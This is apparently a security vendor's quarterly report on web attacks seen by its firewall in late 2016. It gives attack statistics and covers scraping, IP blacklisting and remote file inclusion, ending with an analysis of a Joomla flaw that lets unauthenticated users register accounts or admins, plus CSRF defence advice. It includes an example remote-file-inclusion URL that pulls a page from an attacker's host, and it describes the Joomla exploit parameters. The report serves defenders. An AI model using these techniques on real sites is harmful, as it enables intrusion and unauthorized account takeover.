Security Level Public CDNetworks Q4 2016 Web Attack Analysis Report 2017. 2. Security Service Team
Table of Contents Introduction... 3 Web Attack Analysis... 3 Part I. Web Hacking Statistics... 3 Part II. Web Hacking Cases... 5 Part III. Technical Analysis Data... 9 Conclusion... 13 Public 2 CopyrightcCDNetworks. All Rights Reserved.
Introduction CDNetworks provides a web hacking blocking service by applying Web Application Firewall (WAF) for web application security for customers. This report aims to help our customers operate web applications more safely by sharing the results of analysis of web hacking types identified through CDNetworks' WAF during the fourth quarter of 2016. Web Attack Analysis Part I. Web Hacking Statistics 1. Language-specific We found signs of attack on PHP (84%), JAVA (3%) and other languages (Python, etc., 13%), which are attributed primarily to the exposure of vulnerabilities of public CMS developed based on PHP (WordPress, Joomla, etc.) and attacks on them. 3% 13% 84% PHP JAVA ETC <Fig. 1> Web attacks by language 2. Vulnerability Type-specific SQL Injection, CSRF (Cross-site Request Forgery) and XSS (Cross-site scripting) account for most of the attack attempts. Public 3 CopyrightcCDNetworks. All Rights Reserved.
CSRF SQL Injection 26% 28% XSS 13% multiple vulnerabilities 10% authentication bypass Remote Code Execution 5% 6% Local file inclusion privilege escalation 3% 3% etc 6% <Fig. 2> Web attacks by vulnerability type Secure Coding OWASP Top 10 Type Share CWE-89 A1 SQL Injection 26% CWE-94 A1 Remote Code Execution 5% CWE-592 A2, A7 Authentication bypass 6% CWE-269 A2, A7 Privilege escalation 3% CWE-79 A3 XSS 13% CWE-98 A4 Local File Inclusion 3% CWE-352 A5 CSRF 28% Includes a Includes a comprehensive comprehensive Multiple vulnerabilities 10% listing of listing of CWE OWASP CWE-434, 23, 530 A4, A6 etc. 6% <Table 1> Vulnerability type Vulnerabilities under "Others" category include those related to file uploads/downloads and exposure of backup files. Public 4 CopyrightcCDNetworks. All Rights Reserved.
Part II. Web Hacking Cases 1. Web Scraping Web scraping is a technique for extracting data from websites by using an automation tool. The first figure shows that vulnerabilities of the website are identified through attacks without application of WAF. <Fig. 3> The vulnerability results using a web vulnerability analysis tool - 1 The second figure shows that WAF blocks most of the attack attempts. As for attack tool access, whether to allow or reject access is determined depending on the recognition of rate limit (access frequency), specific header (set-cookie) and page value (javascript). <Fig. 4> The vulnerability results using a web vulnerability analysis tool - 2 Public 5 CopyrightcCDNetworks. All Rights Reserved.
2. IP reputation IP reputation services block attacks by using a blacklist of IPs with attack history and use the following database information. <Fig. 5> IP reputation Any access attempt by an attacker with a blacklisted IP is blocked through client_ip field information identified through WAF. <Fig. 6> WAF detection information You can find the validation method for the relevant IP simply through googling. <Fig. 7> Results of googling IP validation method. Public 6 CopyrightcCDNetworks. All Rights Reserved.
Currently, there are a growing number of IPs used by Mirai, a botnet exploiting IoT, but attempts to use such IPs can be detected and blocked through this rule. http://data.netlab.360.com/mirai-scanner <Fig. 8> Mirai activity trend 3. Remote File Inclusion Remote file inclusion is a technique that includes malicious remote pages in the application to execute commands and acquire authority. As shown below, inclusion of malicious sites in the file parameter can be detected. (Example) http://vulnerable_host/vuln_page.php?file=http://attacker_site/malicous_page In the following case, the attempt to include a Russian domain in _dc parameter of picturefill.min.js was detected and blocked. Public 7 CopyrightcCDNetworks. All Rights Reserved.
<Fig. 9> WAF detection information The reliability validation method for the included domain was checked through a malicious file and URL analyzer site (Virustotal) and it was not determined to be an actual attack, as it was undetected through 68 anti-virus engines. <Fig. 10> Result of Virustotal lookup Public 8 CopyrightcCDNetworks. All Rights Reserved.
Part III. Technical Analysis Data Cross site request forgery (CSRF) is a malicious attack that forces an end user of a web application to execute actions of the attackers choosing by exploiting the site's vulnerabilities. CSRF takes place primarily when cookies (authentication information) used to identify individual users are not used properly according to purpose and authority so that the a ttacker can execute certain tasks or forge information by bypassing authority. For example, a procedure for posting a message on a certain message board is usually (1) accessing the board, (2) clicking "Write", (3) writing a message and (4) posting the message. But if posting a message is permitted without login, a large amount of spam can be posted in the board. This document will explore the process of analyzing vulnerabilities found in Joomla (homepage authoring CMS tool). Joomla 3.6.4 or previous versions have a vulnerability where an account is created or admin authority is randomly acquired. OWASP Top 10 OWASP Top 10 Result Remarks A8-Cross-Site-Request Forgery (CSRF) Vulnerable <Table 2> OWASP TOP 10-A8 Secure Coding CWE (Common Weakness Enumeration) Secure Coding (CWE) Result Remarks CWE-352: Cross-Site Request Forgery (CSRF) Vulnerable <Table 3> CWE-352 The above vulnerabilities take place primarily because a user can be added without authentication if register( ) in the source code (/com_users/controllers/user.php) is called. Public 9 CopyrightcCDNetworks. All Rights Reserved.
<Fig. 11> user.php vulnerability code The first attempt can add a user randomly by including registration.register in the parameter task value. <Fig. 12> user.php exploitation - 1 Public 10 CopyrightcCDNetworks. All Rights Reserved.
The second attempt can register an admin by including user.register in the parameter task value. <Fig. 13> user.php exploitation - 2 As shown below, a malicious user has been added. <Fig. 14> Addition of an unauthorized user Unlike the normal intended operation of an application, CSRF exploits abnormal paths. Attacks are not detected through blackbox (web scanner, etc.) or whitebox (source code diagnosis), but a consultant will discover vulnerabilities through a direct attack on the related module. Then how are such vulnerabilities removed? Secure Coding Guide, which was distributed in Korea, recommends changing the GET method to the POST method. Public 11 CopyrightcCDNetworks. All Rights Reserved.
Source: JAVA Secure Coding Guide for e-gov Software Developers <Fig. 15> Incorrect example regarding CSRF safe code But as POST method data forgery is possible through a proxy tool as well, the example is incorrect. Instead of the above method, it is better to transmit encrypted tokens to each critical page and validate the value from the server. The below example shows the secure coding method using the open csrffilter class. <Fig. 16> CSRF filter Public 12 CopyrightcCDNetworks. All Rights Reserved.
Through this, data forgery can be identified and blocked by re-validating the <secure-random> value delivered to the page on the server. <Fig. 17> CSRF exploitation and protection cases Conclusion We have explored various web attack types and the exploitation of Joomla applications for Q4 2016 and found that continuous attack attempts have been made against customers. As there are attempts to collect information through automated bots and security accidents related to DDoS attacks, such as GET flooding, it is essential to establish suitable security measures. CDNetworks' Cloud Security Service as a cloud-based web firewall is an effective solution for web security as it provides multi-tier protection to block DDoS, access by automated bots, and attacks on web vulnerabilities. Public 13 CopyrightcCDNetworks. All Rights Reserved.
About CDNetworks CDNetworks is a global content delivery network (CDN) with fully integrated Cloud Security DDoS protection and web application firewall. Our mission is to transform the Internet into a secure, reliable, scalable, and high-performing Application Delivery Network. CDNetworks accelerates more than 40,000 websites and cloud services over a network of 200 global PoPs in established and emerging markets including China and Russia. We have been serving enter prise customers for 16 years across industries such as gaming, finance, ecommerce, high tech, manufacturing, and media. CDNetworks offices are located in the U.S., UK, South Korea, China, Japan, and Singapore. For more information, please visit: https://www.cdnetworks.com.sg Copyright Statement Copyright CDNetworks. All Rights Reserved. Copyright in this document is owned by CDNetworks, and you may not reproduce or distribute this document without the prior permission of CDNetworks. Information in this document is subject to change without notice. Global Offices Singapore 51 Cuppage Road, #06-07, Singapore 229469 +65 6908 1198 US 1919 S. Bascom Avenue, Ste. 600, Campbell, CA 95008-2220 +1 408 228 3700 EMEA 85 Gresham Street, London EC2V 7NQ +44 203 657 2727 Korea 2F, 37, Teheran-ro 8-gil, Gangnam-Gu, Seoul (06239) +82 2 3441 0400 Japan Nittochi Nishi-shinjuku Building, 8th Floor, 6-10-1Nishishinjuku, Shinjuku-ku, Tokyo 160 0023 +81 3 5909 3369 China F15-05 Tower B, Greenland Center, Science and Technology Business Area, Wangjing, Chaoyang District, Beijing, 100102 +86 10 8441 7749 Public 14 CopyrightcCDNetworks. All Rights Reserved.